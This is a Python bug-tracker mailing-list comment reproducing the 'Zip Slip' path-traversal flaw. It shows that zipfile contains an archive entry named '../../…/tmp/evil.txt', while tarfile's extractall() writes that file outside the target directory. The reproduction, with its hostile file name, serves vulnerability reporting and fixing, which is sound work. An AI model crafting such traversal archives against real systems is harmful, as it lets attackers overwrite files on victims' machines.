[issue35909] Zip Slip Vulnerability

Wed, 06 Feb 2019 02:34:08 -0800 


Christian Heimes <li...@cheimes.de> added the comment:

You are both right and wrong. The zipfile module of Python 3.7 is fine, but the 
tarfile module is still vulnerable.

$ curl -O 
https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O 
https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip

Test zipfile:

$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name                                             Modified             Size
good.txt                                       2018-04-15 22:04:30           19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
 2018-04-15 22:04:42           20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip

Test tarfile

$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff         19 2018-04-15 19:04:29 good.txt 
?rw-r--r-- grander/staff         20 2018-06-03 13:49:05 
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
 
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt 
this is an evil one

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue35909>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

Reply via email to